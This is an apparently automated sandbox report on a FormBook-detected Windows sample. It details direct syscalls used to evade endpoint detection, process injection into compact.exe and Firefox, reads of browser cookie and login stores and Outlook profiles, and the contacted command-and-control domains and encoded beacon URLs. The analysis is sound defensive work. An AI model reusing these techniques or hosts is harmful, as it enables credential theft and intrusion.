          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026A50 mov eax, dword ptr fs:[00000030h]0_2_01026A50
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026A50 mov eax, dword ptr fs:[00000030h]0_2_01026A50
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026A50 mov eax, dword ptr fs:[00000030h]0_2_01026A50
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026A50 mov eax, dword ptr fs:[00000030h]0_2_01026A50
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026A50 mov eax, dword ptr fs:[00000030h]0_2_01026A50
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026A50 mov eax, dword ptr fs:[00000030h]0_2_01026A50
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030A5B mov eax, dword ptr fs:[00000030h]0_2_01030A5B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030A5B mov eax, dword ptr fs:[00000030h]0_2_01030A5B
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105CA6F mov eax, dword ptr fs:[00000030h]0_2_0105CA6F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105CA6F mov eax, dword ptr fs:[00000030h]0_2_0105CA6F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105CA6F mov eax, dword ptr fs:[00000030h]0_2_0105CA6F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CEA60 mov eax, dword ptr fs:[00000030h]0_2_010CEA60
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109CA72 mov eax, dword ptr fs:[00000030h]0_2_0109CA72
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109CA72 mov eax, dword ptr fs:[00000030h]0_2_0109CA72
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102EA80 mov eax, dword ptr fs:[00000030h]0_2_0102EA80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4A80 mov eax, dword ptr fs:[00000030h]0_2_010F4A80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058A90 mov edx, dword ptr fs:[00000030h]0_2_01058A90
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028AA0 mov eax, dword ptr fs:[00000030h]0_2_01028AA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028AA0 mov eax, dword ptr fs:[00000030h]0_2_01028AA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01076AA4 mov eax, dword ptr fs:[00000030h]0_2_01076AA4
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01076ACC mov eax, dword ptr fs:[00000030h]0_2_01076ACC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01076ACC mov eax, dword ptr fs:[00000030h]0_2_01076ACC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01076ACC mov eax, dword ptr fs:[00000030h]0_2_01076ACC
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01020AD0 mov eax, dword ptr fs:[00000030h]0_2_01020AD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01054AD0 mov eax, dword ptr fs:[00000030h]0_2_01054AD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01054AD0 mov eax, dword ptr fs:[00000030h]0_2_01054AD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105AAEE mov eax, dword ptr fs:[00000030h]0_2_0105AAEE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105AAEE mov eax, dword ptr fs:[00000030h]0_2_0105AAEE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103AD00 mov eax, dword ptr fs:[00000030h]0_2_0103AD00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103AD00 mov eax, dword ptr fs:[00000030h]0_2_0103AD00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0103AD00 mov eax, dword ptr fs:[00000030h]0_2_0103AD00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01016D10 mov eax, dword ptr fs:[00000030h]0_2_01016D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01016D10 mov eax, dword ptr fs:[00000030h]0_2_01016D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01016D10 mov eax, dword ptr fs:[00000030h]0_2_01016D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01054D1D mov eax, dword ptr fs:[00000030h]0_2_01054D1D
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D8D10 mov eax, dword ptr fs:[00000030h]0_2_010D8D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010D8D10 mov eax, dword ptr fs:[00000030h]0_2_010D8D10

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeSection loaded: NULL target: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeSection loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\compact.exeThread register set: target process: 8012Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\compact.exeThread APC queued: target process: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading          		312
          Process Injection          		2
          Virtualization/Sandbox Evasion          		1
          OS Credential Dumping          		121
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism          		312
          Process Injection          		LSASS Memory2
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Abuse Elevation Control Mechanism          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Software Packing          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NjjLYnPSZr.exe61%ReversingLabsWin32.Backdoor.FormBook
          NjjLYnPSZr.exe100%AviraTR/Crypt.ZPACK.Gen
          NjjLYnPSZr.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          sacidasorte.com
          		3.33.130.190
          		truetrue
            		unknown
            kloeti.pc205kopl.com
            		162.209.189.212
            		truetrue
              		unknown
              www.tigun.top
              		23.249.190.35
              		truetrue
                		unknown
                www.beescy.xyz
                		162.0.213.72
                		truetrue
                  		unknown
                  go2super.app
                  		3.33.130.190
                  		truetrue
                    		unknown
                    corverd.store
                    		81.88.48.71
                    		truetrue
                      		unknown
                      www.personalcaresale.shop
                      		104.21.21.230
                      		truetrue
                        		unknown
                        yourtech-agency.com
                        		109.234.166.180
                        		truetrue
                          		unknown
                          connect.hostinger.com
                          		34.120.137.41
                          		truefalse
                            		unknown
                            mybodyradar.net
                            		3.33.130.190
                            		truetrue
                              		unknown
                              ainude2.cloud
                              		84.32.84.32
                              		truetrue
                                		unknown
                                www.ainude2.cloud
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.zt555.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.sacidasorte.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.go2super.app
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.yourtech-agency.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.66hc7.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.mybodyradar.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.yosoyemy.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.corverd.store
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.mybodyradar.net/qyz6/?Sh=cO/WbHS7dDlPjWOw24pePOdtBvzI7qrstwS5E88tqn3GEGw6O6zMXAiSEd+QRtw+ArL2+ZdGEPoP/wr/W49OxjdcbcDVqf77kjZAc/w1Hn9qnxIMaTPUER4=&f6SpQ=_n84nZ4HGtatrue
                                                    		unknown
                                                    http://www.sacidasorte.com/dcai/?Sh=JzKwzxEjjJDs1ynMHer+TNevqF7oFKk+RBNCM6w6NpGOWZMZrcBh0esk0Vp2cdNARH8NLeIYDalhXOdQ0Ma7tvgTEF7hsrDYV+tcKJvJSVI5izhoL98hwXM=&f6SpQ=_n84nZ4HGtatrue
                                                      		unknown
                                                      http://www.beescy.xyz/m4qv/true
                                                        		unknown
                                                        http://www.yosoyemy.com/o1rp/?Sh=TBsR9lfn+qQhrzhd4VN7whgaax1SSLbEYlfYc+CfPbvAogjyvhThgxnzNfioE4F1AGXhUEA9gsdduAUKMlkxrWhulp0A29FjViMz3Iaz4UFzPouUBmhdpGY=&f6SpQ=_n84nZ4HGtafalse
                                                          		unknown
                                                          http://www.66hc7.com/x35b/?Sh=fVDKJz+SStMVbfQUmkYKwfd/Kz5vW54YQ3dZU+tucUYAFBvCN7d4q6mFay3q8TR2KAYtpV66b4jE73PrL/8YW0e6Mz+digafyc3ZonBVmSzoReAw1BtBLHs=&f6SpQ=_n84nZ4HGtatrue
                                                            		unknown
                                                            http://www.beescy.xyz/m4qv/?Sh=P2TusARkbEgcEs+mDyMHtP9emvoSKlJZWWEgC4tjmOg8nAhT+FFe9yeelcBnkIXwjfDCMJlqRnnZfo12xo8UG7kWIL0+yfipd64llhGw+b1VwhgkmL0TKqs=&f6SpQ=_n84nZ4HGtatrue
                                                              		unknown
                                                              http://www.go2super.app/uqfz/?Sh=mcURcygGZpi8BUAEri2LzCX8yukoHIUSB9ATV0AA66/eXSD2DbYq2fDOBcTf2y0GiA7pk1o8xA7eBrRh6Cv9Vx9YWZ7NmBQtUSw3jvSSlGdRHD15Z6r2w2o=&f6SpQ=_n84nZ4HGtatrue
                                                                		unknown
                                                                http://www.personalcaresale.shop/7ug6/true
                                                                  		unknown
                                                                  http://www.66hc7.com/x35b/true
                                                                    		unknown
                                                                    http://www.zt555.shop/uj7x/true
                                                                      		unknown
                                                                      http://www.yosoyemy.com/o1rp/false
                                                                        		unknown
                                                                        http://www.corverd.store/3nzp/true
                                                                          		unknown
                                                                          http://www.mybodyradar.net/qyz6/true
                                                                            		unknown
                                                                            http://www.ainude2.cloud/wzoz/true
                                                                              		unknown
                                                                              http://www.yourtech-agency.com/99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7+Ax68vpI3pksmQcQlCqcURGXTbbLy2S/SU0nQLTr9eIuSCZyPnks+fy4cbgfRvRA7W8zuFue70e+ik0nvs8B1GRgQpORnQ=true
                                                                                		unknown
                                                                                http://www.go2super.app/uqfz/true
                                                                                  		unknown
